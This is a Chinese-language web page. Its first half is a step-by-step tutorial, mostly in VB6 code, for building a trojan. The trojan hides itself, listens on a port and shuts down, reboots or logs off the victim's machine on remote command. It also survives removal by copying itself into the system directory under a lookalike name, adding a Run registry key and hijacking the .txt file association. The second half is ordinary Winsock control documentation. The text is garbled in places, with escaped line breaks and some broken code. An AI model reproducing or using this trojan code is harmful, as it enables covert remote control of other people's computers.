首先,新建一工程,名为Server,新建一个
窗体,Name为frmServer,在窗体中加入一个winsock
控件,Name设为sckServer,协议设为默认的TCP/IP协议。\x0d\x0a接下来我们回来frmServer窗体模块中,添加如下代码:\x0d\x0aPrivate Sub form_Load()\x0d\x0a With Me\x0d\x0a .sckServer.LocalPort = 4000‘本地端口\x0d\x0a .sckServer.Listen ‘开始监听\x0d\x0a End With\x0d\x0aEnd Sub\x0d\x0a‘接受客户端的连接请求。\x0d\x0aPrivate Sub sckServer_ConnectionRequest(ByVal requestID As Long)\x0d\x0a With Me\x0d\x0a If .sckServer.State sckClosed Then .sckServer.Close\x0d\x0a .sckServer.Accept (requestID)\x0d\x0a End With\x0d\x0aEnd Sub\x0d\x0a下面我们来建立客户端程序:新建一个工程,名为Client,把窗体名为frmClient,在上面加入一个winsock控件,名为sckClient,协议为TCP/IP协议。再加一个按钮cmdConnect在窗体模块中加入代码:\x0d\x0aPrivate Sub form_Load()\x0d\x0a With Me\x0d\x0a .sckClient.RemoteHost = "127.0.0.1"‘设置远程IP,本例设为本机。\x0d\x0a .sckClient.RemotePort = 4000 ‘远程端口,就为server中的设置一样.\x0d\x0a End With\x0d\x0aEnd Sub\x0d\x0aPrivate sub cmdConnect_Click()\x0d\x0aSckClient.Connect\x0d\x0aEnd sub\x0d\x0a至此,单击Connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在Client中的sckClient_Connect事件中加入代码:debug.print “Connetion successful!”来查看。\x0d\x0a这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,我们打算实现一点小小的功能———关机,重启,注销。好,开始吧!\x0d\x0a在Server工程中新建一个模块,Name为modApi,这个模快为一些API函数,添加如下API函数:\x0d\x0a Public Declare Function ExitWindowsEx Lib "user32" Alias "ExitWindowsEx" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long\x0d\x0aPublic Const EWX_LOGOFF = 0\x0d\x0aPublic Const EWX_REBOOT = 2\x0d\x0aPublic Const EWX_SHUTDOWN = 1\x0d\x0aPublic Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long\x0d\x0aPublic Type RECT\x0d\x0a Left As Long\x0d\x0a Top As Long\x0d\x0a Right As Long\x0d\x0a Bottom As Long\x0d\x0aEnd Type\x0d\x0a注:在两个socket中编程中,进行通信的重要事件是DataArrival事件,用于接收远程数据。\x0d\x0a下面在Client工程的frmClient窗体中放入三个按钮,分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机,注销,重启 *** 作。分别添加如下代码:\x0d\x0aPrivate Sub cmdExit_Click()\x0d\x0a Me.sckClient.SendData "Exit"\x0d\x0aEnd Sub\x0d\x0a\x0d\x0aPrivate Sub cmdLogoff_Click()\x0d\x0a Me.sckClient.SendData "Logoff"\x0d\x0aEnd Sub\x0d\x0a\x0d\x0aPrivate Sub cmdReboot_Click()\x0d\x0a Me.sckClient.SendData "Reboot"\x0d\x0aEnd Sub\x0d\x0a全都是对服务端发出请求。下面转到Server工程中:在frmServer中添加sckServer的DataArrial事件,接收客户端的请求。\x0d\x0aPrivate Sub sckServer_DataArrival(ByVal bytesTotal As Long)\x0d\x0a Dim strData As String\x0d\x0a With Me\x0d\x0a '' 接收客户请求的信息\x0d\x0a .sckServer.GetData strData\x0d\x0a Select Case strData\x0d\x0a Case "Exit"\x0d\x0a ''关机\x0d\x0a Call ExitWindowsEx(EWX_SHUTDOWN, 0)\x0d\x0a Case "Reboot"\x0d\x0a ''重启\x0d\x0a Call ExitWindowsEx(EWX_REBOOT, 0)\x0d\x0a Case "Logoff"\x0d\x0a ''注销\x0d\x0a Call ExitWindowsEx(EWX_LOGOFF, 0)\x0d\x0a End Select\x0d\x0a End With\x0d\x0aEnd Sub\x0d\x0a好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在frmServer中的form_Load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧!\x0d\x0a回到Server工程中的modApi中加入如下API函数:\x0d\x0aPublic Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long\x0d\x0aPublic Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long\x0d\x0aPublic Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long\x0d\x0aPublic Const REG_BINARY = 3\x0d\x0aPublic Const REG_SZ = 1\x0d\x0aPublic Const HKEY_LOCAL_MACHINE = &H80000002\x0d\x0aPublic Const HKEY_CLASSES_ROOT = &H80000000\x0d\x0a写到注册表启动组中的过程。\x0d\x0aPublic Sub StartupGroup()\x0d\x0a Dim sKey As String\x0d\x0a Dim result As Long\x0d\x0a Dim hKeyID As Long\x0d\x0a Dim sKeyVal As String\x0d\x0a \x0d\x0a sKey = "Systrsy" ''启动组中的键,找一个与系统文件相近的。\x0d\x0a sKeyVal = "C:\windows\system\systrsy.exe" ''木马文件的路径,可以用GetSystemDirectory来取得系统路径。\x0d\x0a result = RegOpenKey(HKEY_LOCAL_MACHINE, _\x0d\x0a "Software\Microsoft\Windows\CurrentVersion\Run", hKeyID)\x0d\x0a If result = 0 Then\x0d\x0a result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, _\x0d\x0a Len(sKey) + 1)\x0d\x0a End If\x0d\x0aEnd Sub\x0d\x0a好就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:\x0d\x0aPublic Sub WriteToTxt()\x0d\x0a Dim result As Long\x0d\x0a Dim hKeyID As Long\x0d\x0a Dim skey As String\x0d\x0a Dim skeyVal As String\x0d\x0a skey = "txtfile\shell\open\command"\x0d\x0a skeyVal = "C:\windows\system\txtView.exe"\x0d\x0a result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)\x0d\x0a If result = 0 Then\x0d\x0a result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, _\x0d\x0a skeyVal, Len(skeyVal) + 1)\x0d\x0a End If\x0d\x0aEnd Sub\x0d\x0a肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:\windows\system\txtView.exe是哪里来的,我们的木马是C:\windows\system\systrsy.exe呀。这可是我们木马的分身了。\x0d\x0a好,回到Server工程的frmServer窗体的form_Load中,加入如下代码:\x0d\x0aDim sCurrentPath As String, sSystemDir As String\x0d\x0a sCurrentPath = App.Path &"\" &App.EXEName &".exe"\x0d\x0a sSystemDir = “C:\windows\system”\x0d\x0a On Error Resume Next\x0d\x0a‘复制文件成系统目录下的Systrsy.exe\x0d\x0a FileCopy sCurrentPath, sSystemDir &"\Systrsy.exe"\x0d\x0a On Error Resume Next\x0d\x0a复制文件成系统目录下的txtView.exe\x0d\x0a FileCopy sCurrentPath, sSystemDir &"\txtView.exe"\x0d\x0a\x0d\x0a调用\x0d\x0aCall startupGroup\x0d\x0aCall WriteToTxt\x0d\x0a\x0d\x0a''判断程序是否下在运行\x0d\x0a If App.PrevInstance Then\x0d\x0a ‘如果已经运行就退出。\x0d\x0a End\x0d\x0a End If工程->部件
然后勾选 microsoft Winsock Control 6.0(SP4)
确定就OK了
然后双击 那个有点像 两个小电脑的图标
在VB6.0的窗体中加入一个winsock控件(步骤完成)
使用 Winsock 控件步骤:
一)选择通讯协议
在使用 WinSock 控件时,首先需要考虑使用什么协议。可以使用的协议包括 TCP 和 UDP。
到底选择哪一种协议通常是由需要创建的应用程序决定的。下面的几个问题将有助于选择适宜的协议:
在收发数据的时候,应用程序是否需要得到客户端或者服务器的确认信息?如果需要,使用 TCP 协议,在收发数据之前先建立明确的连接。
数据量是否特别大(例如图象与声音文件)?在连接建立之后,TCP 协议将维护连接并确保数据的完整性。不过,这种连接需要更多的计算资源,因而是比较“昂贵”的。
数据发送是间歇的,还是在一个会话内?例如,如果应用程序在某个任务完成的时候需要通知某个计算机,UDP 协议是更适宜的。UDP 协议适合发送少量的数据。
二)协议的设置
在设计时,可以按如下方式设置应用程序使用的协议:在“属性”窗口中单击“协议”,然后选择 sckTCPProtocol 或者 sckUDPProtocol。也可以使用程序代码来设置 Protocol 属性,如下所示:
Winsock1.Protocol = sckTCPProtocol
三)确定计算机的名称
在与远程计算机相连接的时候,需要知道它的 IP 地址或者它的“好听的名字”。IP 地址是一串数字,每三个数字为一组,中间用点隔开(形如 xxx.xxx.xxx.xxx)。通常,最易记住的是计算机的“好听的名字”。
要确定计算机的名字,请按照以下步骤执行:
在计算机的“任务栏”上,单击“启动”。
在“设置”项中,单击“控制面板”。
双击“网络”图标。
单击“标识”选项卡。
在“计算机名称”框中可以找到计算机的名称。
上面找到的计算机名称可以作为 RemoteHost 属性的值。
四)TCP 连接初步
如果应用程序要使用 TCP 协议,那么首先必须决定应用程序是服务器还是客户端。如果要创建一个服务器端,那么应用程序需要“监听”指定的端口。当客户端提出连接请求时,服务器端能够接受请求并建立连接。在连接建立之后,客户端与服务器端可以自由地互相通讯。
五)下列步骤创建一个非常简单的服务器:
要创建一个 TCP 服务器,请按照以下步骤执行:
创建新的 Standard EXE 工程。
将缺省窗体的名称改为 frmServer。
将窗体的标题改为“TCP 服务器”。
在窗体中放入一个 Winsock 控件,并将它的名字改为 tcpServer。
在窗体上添加两个 TextBox 控件。将第一个命名为 txtSendData,第二个为 txtOutput。
为窗体添加如下的代码。
Private Sub Form_Load()
'将 LocalPort 属性设置为一个整数。
'然后调用 Listen 方法。
tcpServer.LocalPort = 1001
tcpServer.Listen
frmClient.Show '显示客户端的窗体。
End Sub
Private Sub tcpServer_ConnectionRequest _
(ByVal requestID As Long)
'检查控件的 State 属性是否为关闭的。
'如果不是,
'在接受新的连接之前先关闭此连接。
If tcpServer.State <> sckClosed Then _
tcpServer.Close
'接受具有 requestID 参数的
'连接。
tcpServer.Accept requestID
End Sub
Private Sub txtSendData_Change()
'名为 txtSendData 的 TextBox 控件中
'包含了要发送的数据。当用户往文本框中
'键入数据时,使用 SendData 方法
'发送输入的字符串。
tcpServer.SendData txtSendData.Text
End Sub
Private Sub tcpServer_DataArrival _
(ByVal bytesTotal As Long)
'为进入的数据声明一个变量。
'调用 GetData 方法,并将数据赋予名为 txtOutput
'的 TextBox 的 Text 属性。
Dim strData As String
tcpServer.GetData strData
txtOutput.Text = strData
End Sub
上面的步骤创建了一个简单的服务器应用程序。为了使它能够工作,还必须为它创建一个客户端的应用程序。
六)创建 TCP 客户端,请按照以下步骤执行:
在工程中添加一个新的窗体,将其命名为 frmClient。
将窗体的标题改为“TCP Client”。
在窗体中添加一个 Winsock 控件,并将其命名为 tcpClient。
在 frmClient 中添加两个 TextBox 控件。将第一个命名为 txtSend,第二个为 txtOutput。
在窗体上放一个 CommandButton 控件,并将其命名为 cmdConnect。
将 CommandButton 控件的标题改为 Connect。
在窗体中添加如下的代码。
重点 必须将 RemoteHost 属性值修改为您的计算机的名字。
Private Sub Form_Load()
'Winsock 控件的名字为 tcpClient。
'注意:要指定远程主机,可以使用
' IP 地址(例如:"121.111.1.1"),也可以使用
'计算机的“好听的名字”如下所示。
tcpClient.RemoteHost = "RemoteComputerName"
tcpClient.RemotePort = 1001
End Sub
Private Sub cmdConnect_Click()
'调用 Connect 方法,初始化连接。
tcpClient.Connect
End Sub
Private Sub txtSendData_Change()
tcpClient.SendData txtSend.Text
End Sub
Private Sub tcpClient_DataArrival _
(ByVal bytesTotal As Long)
Dim strData As String
tcpClient.GetData strData
txtOutput.Text = strData
End Sub
上面的代码创建了一个简单的客户/服务器模式的应用程序。我们可以将两者都运行起来:运行工程,然后单击“连接”。在两个窗体之一的 txtSendData 文本框中键入文本,可以看到同样的文字将出现在另一个窗体的 txtOutput 文本框中。
七)Winsock 控件
Winsock 控件对用户来说是不可见的,它提供了访问 TCP 和 UDP 网络服务的方便途径。Microsoft
Access、Visual Basic、Visual C++ 或 Visual FoxPro 的开发人员都可使用它。为编写客户或服务器应用程序,不必了解 TCP
的细节或调用低级的 Winsock APIs。通过设置控件的属性并调用其方法就可轻易连接到一台远程机器上去,并且还可双向交换数据。
TCP 基础
数据传输协议允许创建和维护与远程计算机的连接。连接两台计算机就可彼此进行数据传输。
如果创建客户应用程序,就必须知道服务器计算机名或者 IP 地址(RemoteHost
属性),还要知道进行“侦听”的端口(RemotePort 属性),然后调用 Connect 方法。
如果创建服务器应用程序,就应设置一个收听端口(LocalPort 属性)并调用 Listen
方法。当客户计算机需要连接时就会发生 ConnectionRequest 事件。为了完成连接,可调用 ConnectionRequest 事件内的
Accept 方法。
建立连接后,任何一方计算机都可以收发数据。为了发送数据,可调用 SendData 方法。当接收数据时会发生 DataArrival
事件。调用 DataArrival 事件内的 GetData 方法就可获取数据。
UDP 基础
用户数据文报协议 (UDP) 是一个无连接协议。跟 TCP 的 *** 作不同,计算机并不建立连接。另外 UDP 应用程序可以是客户机,也可以是服务器。
为了传输数据,首先要设置客户计算机的 LocalPort 属性。然后,服务器计算机只需将
RemoteHost 设置为客户计算机的 Internet 地址,并将 RemotePort 属性设置为跟客户计算机的
LocalPort 属性相同的端口,并调用 SendData 方法来着手发送信息。于是,客户计算机使用 DataArrival
事件内的 GetData 方法来获取已发送的信息。
微信扫一扫
支付宝扫一扫
评论列表(0条)